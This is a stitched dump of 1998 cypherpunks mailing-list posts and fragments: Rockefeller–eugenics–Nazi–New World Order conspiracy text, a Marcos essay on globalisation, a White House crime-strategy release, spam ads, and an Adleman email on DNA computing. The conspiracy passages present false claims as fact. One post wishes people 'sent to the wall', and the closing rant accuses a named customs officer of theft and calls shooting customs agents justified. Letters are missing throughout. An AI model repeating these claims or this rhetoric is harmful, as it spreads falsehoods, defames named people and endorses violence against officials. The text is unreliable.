Berlin, Verschuer secured funds for Mengele's experiments at Auschwitz
from the German Research Council.  

(Remember, the Rockefellers were originally German immigrants to America.
- Branton)

  In 1936, Rockefeller's Dr. Franz Kallmann interrupted his study of
hereditary degeneracy and emigrated to America because he was half
Jewish.  Kallmann went to New ork and established the Medical Genetics
Department of the New ork State Psychiatric Institute.  The SCOTTISH
RITE of Freemasonry published Kallman's study of over 1,000 cases of
schizophrenia, which tried to prove its hereditary basis.  In the book,
Kallmann thanked his long-time boss and mentor Rudin.
  Kallmann's book, published in 1938 in the USA and Nazi Germany, was
used by the T4 unit as a rationalization to begin in 1939 the murder
of mental patients and various "defectives"
{ForeRunner to genetic/cloning/'grafting' technology - sog}
{Hitler was *scapegoat* for excesses of SOP - sog}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 27 Jul 1998 00:15:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FDR8
Message-ID: <009C9C7C.68C856E0.17@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


In the 1950s, the Rockefellers reorganized the U.S. eugenics movement
in their own family offices, with spinoff population-control AND abortion
groups The Eugenics Society changed its name to the "Society for the
Study of Social Biology", its current name.
  With support from the Rockefellers, the Eugenics Society [England]
set up a sub-committee called the INTERNATIONAL PLANNED PARENTHOOD
FEDERATION, which  for 12 years had no other address than the Eugenics
Society.
  (Note: Margaret Sanger plays a central role in this PLANNED PARENTHOOD
network.
In her book 'PIVOT OF CIVILIZATION',  in reference to free MATERNIT
care for the poor, Sanger states: "Instead of DECREASING and aiming
to ELIMINATE THE STOCKS that are most detrimental to the future of
the race and the world it tends to render them to a menacing degree
dominant.")
{PILOT Of Civilization(?) - sog}

Rockefellers, who played a major role in grooming the agents of the
Communist-Socialist revolution in Russia AND the agents of the National
Socialist revolution in Germany.  Whether it is left-handed Socialism
or right-handed Socialism -- Socialism either way you look at it is
TOTALITARIANISM! - Branton).  

  "...How many of you have seen the book 'BLANK CHECK'?... It is not
a UFO book.  I strongly recommend that you read the book 'BLANK CHECK'
so that you can understand something about how these projects are funded
without your say so, indeed WITHOUT THE SA SO OF CONGRESS.

Garrison might have convicted Clay Shaw if not for the fact that Garrison's
star witness David Ferry was killed a few days before he was to testify
at Clay Shaw's trial.  

*** FEMA / FEMA / FEMA ***

(Most do not realize that Adolph Hitler's second book, after he wrote
MEIN KAMPF, was titled -- believe it or not -- "THE NEW WORLD ORDER".
- Branton)

  SPECULATE NO MORE ON THE SUSPICIOUS SUICIDE OF ADMIRAL MICHAEL BOORDA
[FORMER DIRECTOR OF THE U.S. NAVAL FORCES].  I WAS INFORMED HE WAS
TERMINATED BECAUSE OF HIS REFUSAL TO COOPERATE IN THE COVERT PLAN B
OUR TRAITOROUS NWO FORCES WITHIN OUR OWN GOVERNMENT TO ASSIST IN THE
COMING INVASION OF AMERICA. 
{America is in perfect position to serve as the Great Beast of the
World which must be destroyed, like Nazi Germany. - sog}

The following information is c1997, Andrew H. Hochheimer, and may not
be reposted without written permission.
{es it can... - sog}

I think it is important that people start reading 'The Full Story'
when pursuing any fringe topic like
Ufology, the Bermuda Triangle, etc. There are plenty of paranoid delusionists
writing books like
"Aliens told me 'Humans taste like chicken...'" 

file:///C|/New Deal/Dave Emory/Nazi Roosevelt.txt
Topic 203       Hitler won
gn:peacenews    News from War Resisters International    7:18 PM  Apr
25, 1995

by MILAN RAI

First the empire, second the war against Nazism -- and even that
only to secure "our interests". The historical record after the war
bears out these priorities. Throughout the world, the British and
US governments installed those willing to cater to their
"interests", even when these were fascists or collaborators who the
war had supposedly been against. Throughout the world, Britain and
the USA destroyed those who stood in the way of their plans for
control, even when these resisters were the democrats and
anti-fascists who had fought alongside the Anglo-American forces.

Subject: 
"... would cause us to look at this person as a threat" 
Date: 
Tue, 12 May 1998 11:45:14 -0700 
From: 
Tim May <tcmay@got.net>
To: 
cypherpunks@cyberpass.net

I just saw this on one of the newsgroups:

"A cultist is one who has a strong belief in the Bible and the Second
Coming of Christ; who frequently attends Bible studies; who has a high
level of financial giving to a Christian cause; who home schools for
their children; who has accumulated survival foods and has a strong
belief in the Second Amendment; and who distrusts big government. 
Any
of these may qualify [a person as a cultist] but certainly more than
one
[of these] would cause us to look at this person as a threat, and his
family as being in a risk situation that qualified for government
interference."
-Attorney General Janet Reno, Interview on 60 Minutes, June 26, 1994

No wonder the government views so many people as threats.

How does "qualified for government interference" square with the First,
Second, and Fourth Amendments?

(No doubt Janet also believes that belief in that pesky Fifth Amendment,
not to mention the rest of the Constitution, will cause the government
to
look at these wackos as threats and worth of "government interference."

I'm looking forward to the ear 2000 Meltdown. This fucked up country
needs
a low-level reformatting. And a million government criminals and welfare
addicts sent to the wall.

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:------
--:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms,
zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.

Long ago and far away, Adolf Hitler was talking to Hermann Rauschning
and
said, "The people about us are unaware of what is really happening
to them:
They gaze fascinated at one or two familiar superficialities, such
as
possession and income and rank and other outworn conceptions. As long
as
these are kept intact, they are quite satisfied. But in the meantime
they
have entered a new relation: a powerful social force has caught them
up.
They themselves are changed. What are ownership and income to that?
Why need
we trouble to socialize banks and factories? We socialize human beings."

I see someone has made a TV movie of "Brave New World." Are we to view
it
as a work of fiction, or a Scribean foreshadowing of what looms in
the very
near future?

Geoff Metcalf 

"War is a matter of vital importance for the state;
it is the province of life and death, the road which
leads to survival or elimination. It is essential
to study it in depth".
Sun Tzu, "The Art of War"

http://www.monde-diplomatique.fr/md/en/1997/08-09/marcos.html
The fourth world war has begun
In Chiapas, the Zapatista National Liberation
Army issued no directives about the elections, choosing instead
to withdraw to the sheltering greenery of the Lacandona Forest.
>From this sanctuary the head of the ZNLA, Sub-Commandant
Marcos, sent us this original and geostrategic analysis of the
new world picture.
by Sub-Commandant Marcos
* Zapatista National Liberation Army, Chiapas, Mexico

The defeat of the "evil empire" has opened up new markets, and the
struggle over
them is leading to a new world war - the fourth.

Unlike the third world war, in which the conflict between capitalism
and socialism
took place over a variety of terrains and with varying degrees of intensity,
the fourth
world war is being conducted between major financial centres in theatres
of war that
are global in scale and with a level of intensity that is fierce and
constant.

The third world war showed the benefits of "total war" for its victor,
which was
capitalism. In the post-cold war period we see the emergence of a new
planetary
scenario in which the principal conflictual elements are the growing
importance of
no-man's-lands (arising out of the collapse of the Eastern bloc countries),
the
expansion of a number of major powers (the United States, the European
Union and
Japan), a world economic crisis and a new technical revolution based
on information
technology.

Thanks to computers and the technological revolution, the financial
markets,
operating from their offices and answerable to nobody but themselves,
have been
imposing their laws and world-view on the planet as a whole. Globalisation
is merely
the totalitarian extension of the logic of the finance markets to all
aspects of life.
Where they were once in command of their economies, the nation states
(and their
governments) are commanded - or rather telecommanded - by the same
basic logic
of financial power, commercial free trade. And in addition, this logic
has profited
from a new permeability created by the development of telecommunications
to
appropriate all aspects of social activity. At last, a world war which
is totally total!

The new international capitalism renders national capitalism
obsolete and effectively starves their public powers into extinction.
The blow has
been so brutal that sovereign states have lost the strength to defend
their citizens'
interests.

The fine showcase inherited from the ending of the cold war - the new
world order -
has shattered into fragments as a result of the neoliberal explosion.
It takes no more
than a few minutes for companies and states to be sunk - but they are
sunk not by
winds of proletarian revolution, but by the violence of the hurricanes
of world finance.

The son (neoliberalism) is devouring the father (national capital)
and, in the process,
is destroying the lies of capitalist ideology: in the new world order
there is neither
democracy nor freedom, neither equality nor fraternity. The planetary
stage is
transformed into a new battlefield, in which chaos reigns.

Megalopolises are reproducing themselves right across the planet. Their
favourite
spawning ground is in the world's free trade areas. In North America,
the North
American Free Trade Agreement between Canada, the United States and
Mexico is
a prelude to the accomplishment of an old dream of US conquest: "America
for the
Americans".

Are megalopolises replacing nations? No, or rather not merely that.
They are
assigning them new functions, new limits and new perspectives. Entire
countries are
becoming departments of the neoliberal mega-enterprise. 

the financial centres are working on a reconstruction of nation states
and are
reorganising them within a new logic: the economic has the upper hand
over the
social.

In this new war, politics, as the organiser of the nation state, no
longer exists. Now
politics serves solely in order to manage the economy, and politicians
are now merely
company managers.

The world's new masters have no need to govern directly. National governments
take
on the role of running things on their behalf. This is what the new
order means -
unification of the world into one single market.
The unification produced by
neoliberalism is economic: in the giant planetary hypermarket it is
only commodities
that circulate freely, not people.

What we have
here is a destruction of the material bases of nation states, but we
also have a
destruction of history and culture.
Neoliberalism thus imposes the destruction of
nations and of groups of nations in order to fuse them into one single
model. The war
which neoliberalism is conducting against humanity is thus a planetary
war, and is the
worst and most cruel ever seen.

What we have here is a puzzle. 
The first of these pieces is the two-fold accumulation of wealth and
of poverty at the
two poles of planetary society. The second is the total exploitation
of the totality of
the world. The third is the nightmare of that part of humanity condemned
to a life of
wandering. The fourth is the sickening relationship between crime and
state power.
The fifth is state violence. The sixth is the mystery of megapolitics.
The seventh is the
multiple forms of resistance which humanity is deploying against neoliberalism.

Piece no. 1: The concentration of wealth and the distribution of poverty

The earth has five billion human inhabitants:
of these, only 500 million live comfortably; the remaining 4.5 billion
endure lives of
poverty. 
The gap between rich and poor is enormous: far from decreasing, social
inequalities are growing.

Piece no. 2: The globalisation of exploitation

the world capitalist system is
"modernising" the production, circulation and consumption of commodities.
The new
technological revolution (information technology) and the new revolution
in politics
(the megalopolises emerging from the ruins of the nation state) produce
a new social
"revolution". This social revolution consists of a rearrangement, a
reorganisation of
social forces and, principally, of the workforce.

The world's economically active population (EAP) went from 1.38 billion
in 1960 to
2.37 billion in 1990. A large increase in the number of human beings
capable of
working and generating wealth. But the new world order arranges this
workforce
within specific geographical and productive areas, and reassigns their
functions (or
non-functions, in the case of unemployed and precarious workers) within
the plan of
world globalisation. The world's economically active population by
sector (EAPS)
has undergone radical changes during the past 20 years. Agriculture
and fishing fell
from 22 % in 1970 to 12 % in 1990; manufacture from 25 % to 22 %; but
the
tertiary sector (commercial, transport, banking and services) has risen
from 42 % to
56 %. In developing countries, the tertiary sector has grown from 40
% in 1970 to
57 % in 1990, while agriculture and fishing have fallen from 30 % to
15 % (2). This
means that increasing numbers of workers are channelled into the kind
of activities
necessary for increasing productivity or speeding up the creation of
commodities

this "modern" capitalist production
continues to rely on child labour. Out of 1.15 billion children in
the world, at least
100 million live on the streets and 200 million work

The globalised
market is destroying small and medium- sized companies. With the disappearance
of
local and regional markets, small and medium producers have no protection
and are
unable to compete with the giant transnationals.

All this combines to create a specific surplus: an excess of human
beings who are
useless in terms of the new world order because they do not produce,
do not
consume, and do not borrow from banks. In short, human beings who are
disposable. Each day the big finance centres impose their laws on countries
and
groups of countries all around the world. They re-arrange and re-order
the
inhabitants of those countries. And at the end of the operation they
find there is still an
"excess" of people.

Piece no. 3: Migration, a nightmare of wandering

there is a proliferation of "regional wars" and "internal
conflicts"; capital follows paths of atypical accumulation; and large
masses of workers
are mobilised. Result: a huge rolling wheel of millions of migrants
moving across the
planet. As "foreigners" in that "world without frontiers" which had
been promised by
the victors of the cold war, they are forced to endure racist persecution,
precarious
employment, the loss of their cultural identity, police repression,
hunger, imprisonment
and murder.

The fourth world war - with its
mechanisms of destruction/depopulation and reconstruction/reorganisation
- involves
the displacement of millions of people. Their destiny is to wander
the world, carrying
the burden of their nightmare with them, so as to constitute a threat
to workers who
have a job, a scapegoat designed to make people forget their bosses,
and to provide
a basis for the racism that neoliberalism provokes.

Piece no. 4: Financial globalisation and the generalisation of crime

With the beginning of the fourth world war, organised crime has globalised
its
activities. The criminal organisations of five continents have taken
on board the "spirit
of world cooperation" and have joined together in order to participate
in the conquest
of new markets. They are investing in legal businesses, not only in
order to launder
dirty money, but in order to acquire capital for illegal operations.
Their preferred
activities are luxury property investment, the leisure industry, the
media - and
banking.

According to a UN report,
the involvement of crime syndicates has been facilitated by the programmes
of
structural adjustment which debtor countries have been forced to accept
in order to
gain access to International Monetary Fund loans (3).
So here we have the rectangular mirror within which legality and illegality
exchange
reflections. On which side of the mirror is the criminal? And on which
side is the
person who pursues him?

Piece no. 5: Legitimate violence of illegitimate powers

In the cabaret of globalisation, the state performs a striptease, at
the end of which it is
left wearing the minimum necessary: its powers of repression. With
its material base
destroyed, its sovereignty and independence abolished, and its political
class
eradicated, the nation state increasingly becomes a mere security apparatus
in the
service of the mega-enterprises which neoliberalism is constructing.
Instead of
orienting public investment towards social spending, it prefers to
improve the
equipment which enables it to control society more effectively.

What is to be done when the violence derives from the laws of the market?
Where is
legitimate violence then? And where the illegitimate?
The monopoly of
violence no longer belongs to nation states: the market has put it
up for auction.

However, when the monopoly of violence is contested not on the basis
of the laws of
the market, but in the interests of "those from below", then world
power sees it as
"aggression". This is one of the (least studied and most condemned)
aspects of the
challenges launched by the indigenous peoples in arms and in rebellion
of the
Zapatista National Liberation Army against neoliberalism and for humanity.

The new world police
wants national armies and police to be simple security bodies guaranteeing
order and progress within the megalopolises of neoliberalism.

Piece no. 6: Megapolitics and its dwarfs

But neoliberalism does not conduct its war
solely by "unifying" nations and regions. Its strategy of destruction/depopulati
on
and
reconstruction/reorganisation also produces a fracture or fractures
within the nation
state. This is the paradox of this fourth world war: while ostensibly
working to
eliminate frontiers and "unite" nations, it actually leads to a multiplication
of frontiers
and the smashing apart of nations.
The elimination of trade
frontiers, the explosion of telecommunications, information superhighways,
the
omnipresence of financial markets, international free trade agreements
- all this
contributes to destroying nation states and internal markets. Paradoxically,
globalisation produces a fragmented world of isolated pieces, a world
full of
watertight compartments which may at best be linked by fragile economic
gangways.

Mega-politics globalises
national politics - in other words it ties them to a centre which has
world interests and
which operates on the logic of the market. It is in the name of the
market that wars,
credits, buying and selling of commodities, diplomatic recognition,
trade blocs,
political support, laws on immigration, breakdowns of relationships
between
countries and investment - in short, the survival of entire nations
- are decided.

The world-wide power of the financial markets is such that they are
not concerned
about the political complexion of the leaders of individual countries:
what counts in
their eyes is a country's respect for the economic programme. Financial
disciplines
are imposed on all alike. These masters of the world can even tolerate
the existence
of left-wing governments, on condition that they adopt no measure likely
to harm the
interests of the market. However, they will never accept policies that
tend to break
with the dominant model.

Piece no. 7: Pockets of resistance

"To begin with, I ask you not to confuse resistance with political
opposition.
Opposition does not oppose itself to power but to a government, and
its fully-formed
shape is that of an opposition party; resistance, on the other hand,
cannot be a party,
by definition: it is not made in order to govern but... to resist."
(TomY s Segovia,
"Alegatorio", Mexico, 1996)

The apparent infallibility of globalisation comes up hard against the
stubborn
disobedience of reality. While neoliberalism is pursuing its war, groups
of protesters,
kernels of rebels, are forming throughout the planet. The empire of
financiers with full
pockets confronts the rebellion of pockets of resistance. es, pockets.
Of all sizes,
of different colours, of varying shapes. Their sole common point is
a desire to resist
the "new world order" and the crime against humanity that is represented
by this
fourth world war.

Whereas the ZNLA fights to defend national sovereignty, the Mexican
Federal Army
functions to protect a government which has destroyed the material
bases of
sovereignty and which has offered the country not only to large-scale
foreign capital,
but also to drug trafficking.

The possible shapes are as numerous as the forms of
resistance themselves, as numerous as all the worlds existing in this
world. So draw
whatever shape you like. In this matter of pockets, as in that of resistance,
diversity is
a wealth.

THE WHITE HOUSE

Office of the Press Secretary
________________________________________________________________________
For Immediate Release                                       May 12,
1998

INTERNATIONAL CRIME CONTROL STRATEG

BACKGROUND

International crime is a serious and potent threat to the American
people at home and abroad.  Drug and firearms trafficking, terrorism,
money laundering, counterfeiting, illegal alien smuggling, trafficking
in women and children, advanced fee scams, credit card fraud, auto
theft, economic espionage, intellectual property theft, computer
hacking, and public corruption are all linked to international criminal
activity and all have a direct impact on the security and prosperity
of
the American people.

Americans spend billions of dollars annually on cocaine and heroin,
all
of which originates abroad; in 1997, there were 123 terrorist attacks
against U.S. targets worldwide, including 108 bombings and eight
kidnappings; each year, approximately one billion dollars worth of
stolen cars are smuggled out of this country; annually, U.S. companies
lose up to $23 billion from the illegal duplication and piracy of films,
compact discs, computer software, pharmaceutical and textile products,
while U.S. credit card companies suffer losses of hundreds of millions
of dollars from international fraud; and several hundred U.S. companies
and other organizations have already suffered computer attacks in 1998,
resulting in millions of dollars of losses and significant threats
to
our safety and security.

PURPOSE

The International Crime Control Strategy (ICCS) addresses this
increasing threat by providing a framework for integrating all facets
of
the federal government response to international crime.  This first
ever
strategy reflects the high priority accorded international crime by
this
Administration and builds on such existing strategies as the National
Drug Control Strategy and the Presidential Directives on alien
smuggling, counter-terrorism and nuclear materials safety and security.

The ICCS is also an important initiative in terms of enhancing the
ability of U.S. law enforcement officials to cooperate effectively
with
their overseas counterparts in investigating and prosecuting
international crime cases.  At the upcoming Birmingham Summit, G-8
leaders will discuss international crime as one of the most pressing
issues related to increasing globalization and rapid technological
and
economic change.  President Clinton will highlight the new ICCS in
underscoring the U.S. commitment to close cooperation with all nations
who are mobilizing to confront this increasing threat.

OVERVIEW

The ICCS is a plan of action containing eight broad goals with thirty
implementing objectives.  The ICCS expresses President Clinton's resolve
to combat international crime aggressively and substantially reduce
its
impact on the daily lives of the American people.

The Strategy's eight goals and related objectives are:

1.   Extend the First Line of Defense Beyond U.S. Borders by
(a) preventing acts of international crime planned abroad before

they occur, (b) using all available laws to prosecute select
criminal acts committed abroad, and (c) intensifying activities
of law enforcement, diplomatic and consular personnel abroad.

2.   Protect U.S. Borders by (a) enhancing our land border inspection,
detection and monitoring capabilities, (b) improving the
effectiveness of maritime and air smuggling interdiction efforts,
(c) seeking new, stiffer criminal penalties for smuggling
activities, and (d) targeting enforcement and prosecutorial
resources more effectively against smuggling crimes and
organizations.

3.   Deny Safe Haven to International Criminals by (a) negotiating
new
international agreements to create a seamless web for the prompt
location, arrest and extradition of international fugitives,
(b) implementing strengthened immigration laws that prevent
international criminals from entering the United States and
provide for their prompt expulsion when appropriate, and
(c) promoting increased cooperation with foreign law enforcement
authorities.

4.   Counter International Financial Crime by (a) combating money
laundering and strengthening enforcement efforts to reduce inbound
and outbound movement of criminal proceeds, (b) seizing the assets
of international criminals, (c) enhancing bilateral and
multilateral cooperation against all financial crime, and
(d) targeting offshore centers of international fraud,
counterfeiting, electronic access device schemes and other
financial crimes.

5.   Prevent Criminal Exploitation of International Trade by (a)
interdicting illegal technology exports, (b) preventing unfair and
predatory trade practices in violation of U.S. criminal law, (c)
protecting intellectual property rights, (d) countering industrial
theft and economic espionage of U.S. trade secrets, and (e)
enforcing import restrictions on certain harmful substances,
dangerous organisms and protected species.

6.   Respond to Emerging International Crime Threats by (a) disrupting
new activities of international organized crime groups,
(b) enhancing intelligence efforts against criminal enterprises,
(c) reducing trafficking in human beings and crimes against
children, (d) increasing enforcement efforts against high tech
and computer-related crime, and (e) continuing to identify and
counter the vulnerabilities of critical infrastructures and new
technologies in high tech areas.

7.   Foster International Cooperation and the Rule of Law by
(a) establishing international standards, goals and objectives to
combat international crime and by actively encouraging compliance,
(b) improving bilateral cooperation with foreign governments and
law enforcement authorities, and (c) strengthening the rule of law
as the foundation for democratic government and free markets in
order to reduce societies' vulnerability to criminal exploitation.

8.   Optimize the Full Range of U.S. Efforts by (a) enhancing executive
branch policy and operational coordination mechanisms to 
the risks of criminal threats and to integrate strategies, goals
and objectives to combat those threats, (b) mobilizing and
incorporating the private sector into U.S. government efforts, and
(c) developing measures of effectiveness to assess progress over
time.

ICCS INITIATIVES

Highlighted below are ten Administration initiatives to further our
efforts to fight international crime.

1.  International Crime Control Act of 1998:  Proposed legislation
containing significant new law enforcement tools for the fight against
international crime.

2.  Comprehensive Threat Assessment:  A comprehensive assessment of
the
threat to the American people posed by international crime, to be
completed within six months.

3.  International Conference on Upholding Integrity Among Justice and
Security Officials:  An international conference to address upholding
integrity among key justice and security officials worldwide, to be
organized by the Vice President within the next six months.

4.  High Tech Crime:  An action plan, building on the work of the G
8
justice and interior ministers and the creation of the U.S. National
Infrastructure Protection Center, to protect interconnected U.S.
communications and information systems from attack by international
criminals.

5.  Border Law Enforcement:  A program to enhance border law enforcement
through deployment of advanced detection technology and investment
of
new resources.

6.  Financial Crimes:  A commitment to employ aggressively new tools
to
deny criminals access to U.S. financial institutions and to enhance
enforcement efforts against financial crimes.

7.  International Asset Forfeiture and Sharing:  A U.S. call for new
criminal asset forfeiture regimes worldwide and new asset forfeiture
sharing agreements with our international partners.

8.  OAS Treaty Against Illicit Trafficking in Firearms:  A program
to
work with our OAS partners to implement fully a hemispheric convention
to combat the illicit manufacturing of and trafficking in firearms,
ammunition and explosives.

9.  Economic Espionage and Theft of Industrial Property:  A commitment
to use the Economic Espionage Act to increase U.S. investigations and
prosecutions of individuals and companies who attempt to steal U.S.
proprietary information.

10.  Strategic Communications Plan:  A plan to engage the private
sector in assessing the impact of international crime on that sector
and in determining its appropriate role in countering this threat.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cory <cory4321@yahoo.com>
Date: Mon, 27 Jul 1998 01:11:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Stego program for jpg or wav? (dos/win)
Message-ID: <19980727080953.16123.rocketmail@send1e.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for a steganogrophy program for dos/win that 
supports wav and one that supports jpg files. Any help?

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loanuorao22@msn.com
Date: Sun, 26 Jul 1998 16:21:57 -0700 (PDT)
To: loanuorao22@msn.com
Subject: NEED TO KNOW HIS OR HER BACKGROUND
Message-ID: <199807272706BAA10623@public.opgk.krakow.pl>
MIME-Version: 1.0
Content-Type: text/plain


INFORMATION SERVICES.........            
    
Your Source For Information    
    
LOCATE DEADBEAT DADS,JUDGEMENT DEBTORS,LOST LOVED ONES,OLD FRIENDS    
                 
Business & Individuals in the USA    

Assets SEARCHES (CHECKING & SAVINGS ACOUNTS) STOCKS BONDS AND SAFE DEPOSIT BOXES   
    
Local, State, National & International    
    
Information needed varies, sometimes just a name.  Helpful information would be Last Known     Address, Social Security Number, Date of Birth and any other information you feel would be of use.  Provide us with everything you have and let the Professionals at Information USA do the rest.    
    
Information SERVICES has the most competitive prices in the industry!  Call today for a free price quote.    
    
    
    
Other Services Available    
    
*Criminal Background *Civil Court Records *Bankruptcy & Liens & Judgments     
*National Real Property *Business Credit Reports *Corporate Profiles    
 *National Bank Asset Information *Stocks & Bonds & Mutual Fund Search    
 *Safe Deposit Box Search *Social Security Death Records *Marriage & Divorce     
*Workers Compensation Records *Non-Published Numbers *Drivers License Records *Vehicle Records Search *Water & Aircraft Search *Pre-Trial Comprehensive Reports     
*Pre-Employment Background *Verify Education *Verify Professional License     
*Verify Employment    
    
Call for additional Services    
    
Information SERVICES    
    
Call Toll Free    
    
1-888-370-9112    
    
Ask for Ken Wagner    
    
Visa, MasterCard & Discove




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 26 Jul 1998 23:09:10 -0700 (PDT)
To: "e$@vmeng.com" <e$@vmeng.com>, "Cypherpunks" <cypherpunks@toad.com>
Subject: short comment from Adleman on DNA computing, DES and RSA
Message-ID: <199807270624.CAA29170@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi Cypherpunks and e$-ers.

After having read Adleman's Sci Am article, I couldn't help but ask him...  :-)

The following message is re-posted with his permission

Ciao

jfa


==================BEGIN FORWARDED MESSAGE==================
From: Len Adleman <xxxxxxxx>
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: Your article in Scientific American and RSA

Thank you for the kind words regarding the Sci Am article. I have thought about
using DNA for breaking cryptosystems. It does appear convievable that a code like
DES could be broken. However, because RSA can simply increase the size of keys to
overcome whatever computing power DNA provides, I do not think it represents a
threat to RSA.

We of course have a long way to go to see whether we can actually get DNA to live
up to its potential.

If you are unfamiliar with quantum computation I think you might enjoy reading
about it - it, at least in theory, could represent a threat to RSA. I believe that
you can find info on the www.
-Len

Jean-Francois Avon wrote:

> Greetings.
>
> Your article in SciAm blew my mind!
>
> I bought the magazine after having seen it because of my interest/inquietude
> of new computing ways that could break RSA (and similar public key) encryption
> schemes.
>
> The most fantastic thing is that I bought the magazine after having browsed
> the article but without even having read who was the author of the article!
> [laughs]
>
> Now, here is my question, which you *surely* figured out: can a method could
> be devised (using DNA computing) that would decrease the security of RSA?  And
> if yes, what would it imperil ( keys, individual cyphertext, etc?)
>
> I could not see a trivial way of effecting multiplication and division, but
> then, maths have never been my forte... ;-)
>
> Any comments?
>
> Highest regards
>
> jfa
===================END FORWARDED MESSAGE===================



Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kimh_26@hotmail.com
Date: Mon, 27 Jul 1998 09:41:54 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Oxygen
Message-ID: <199807271641.JAA21978@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


 The time is now to reach out to all the people on the 
 Internet,with target e-mail.
 
 It's your business,how are you going to advertise your          
 product or service over the Internet?              

 Direct email puts you in front of millions of people who want   
 to know about your product or service.The most cost             
 effective way to make your business explode!

 Never before has it been possible to reach so many for so       
 little.

  We are the leaders in direct email because we do what we       
 say.Our data banks have email buyers for every business.

 Don't worry we will help you with a subject and letter that     
 will work for you.
.                                                                
      Guaranteed
  CALL 1-800-600-0343 ext,1669 leave message.
  
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 27 Jul 1998 08:07:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Quaint Customs Warning - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C9CBE.41EC8040.19@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Canadian Customs Warning - SPACE ALIENS HIDE M DRUGS!!!
________________________________________________________

  Although the Reptilian Nazis making preparations in the lavoratories
of their SecretUnderGroundBunkers pose an eventual threat to the safety
and security of humanity itself, there are many more immediate dangers
present in our lives which can bring serious consequences to anyone who
remains unaware of them.
  Thus, I feel that it is important for everyday, average citizens to
issue travel warnings for those who may be thinking in venturing into
some of the more corrupt areas of the world, such as Canada, where they
may find themselved subject to arbitrary and capricious actions by the
heavy-handed Canadian Customs BorderGuards before even being allowed to
enter the country, after which they will be subject to whatever illegal
acts and measures that the Royal Canadian Mounted Police choose to 
perpetrate upon them.

  It is particularly important to be wary of entering through certain
Customs ports, such as Regway, Saskatchewan, which have a long history
of abuse of authority and criminal malefeasance.
  Bill Mitchell, a Canadian Customs OffalSlur at the Regway port, has
been known to steal thousands of dollars worth of goods from those passing
through while he is on duty, while being extremely evasive when asked
about the legality of his conduct, as well as being very inept at hiding
the fact that he is a lying, scumbag piece of shit who is not intelligent
enough to tell even halfway believable lies.

  Although I normally advise people to make what effort they can to get
whatever measure of Justice they can through normal legal channels, in
the case of countries such as Canada, where even high-ranking political
figures are known to be corrupt, where many of the Judges have histories
of corruption, substance abuse and complicity in the illegal activities
of law enforcement officials, I certainly could not find fault with 
anyone who surveyed the situation they found themselves in and decided
that their best option was to used armed force to prevent becoming a
victim of the oppressive, unethical and illegal actions of armed bandits
working under the cover of Canadian Government Authority.
  As well, although one might morally and ethically be perfectly justified
in putting a bullet through the brain of armed Canadian Government Bandits
who have been trained to deal violently with any person who resists their
attempts at enforcing their alleged authority, even when doing so in an
unethical and illegal manner, it would be unwise for them to act hastily,
since one must be prepared to follow through in regard to such an action,
by also eliminating any other government agents who may be present and
would constitute an immediate or future threat to the individual who
refuses to be subjected to illegal and unethical government actions.

  Although I suppose that one might make a case for being 'better safe
than sorry' when entering Canada through a port such as Regway, and just
going ahead and whacking out the whole lot of them, so that they don't
have a chance to get the jump on you, before proceeding into the country,
I personally think that if one has prepared in advance for dealing with
the danger that the Regway Customs OffalSlurs represent, then this option
should not be necessary.
  Of course, I realize that I, myself, am a rather conservative person,
so I would certainly not pass judgement on those who are more of a
'take the BullShit by the horns' type of individual.

  Being, as I say, rather conservative by nature, I don't usually feel
it necessary to immediately put to death violent armed Canadian Government
Thugs for their crimes against myself or other citizens, even though doing
so might well help to prevent future criminal abuses by violent, armed 
people in positions of authority, since there area variety of other routes
that one might take in extracting a measure of Justice or EqualizationOf
TheAnalSexualBalanceOfTheTao.

  As always, anyone who chooses to attempt to receive redress for the
crimes committed against them by those in authoritative government 
positions will be fighting a battle in which the Canadian Justice System
is stacked against them. Even though Judge Lee, a notorious drunkard who
has performed GodOnlyKnows how many travesties of justice while rendering
legal judgements while totally ShitFaced, has retired, many of the other
Canadian judges, while perhaps not being as totally out-of-control, are
nonetheless known to rubber-stamp pretty much every instance of criminal]
abuse perpetrated on the citizenry, as a matter of course.
  Likewise, the Saskatchewan Justice Department is well-known by the 
citizens to be a FuckingJoke (TM), and that any person who dares to
file a complaint against members of the Canadian Legal Community can
expect to be subjected to ridicule and abuse by Justice Department
Investigators, as well as perhaps finding themselves the target of
further persecution by those being WhiteWashed by their Justice Department
BumBuddies.

  Realizing that any citizen who shot and killed an armed intruder in his
home who was attempting to rob HimOrHer of thousands of dollars worth of
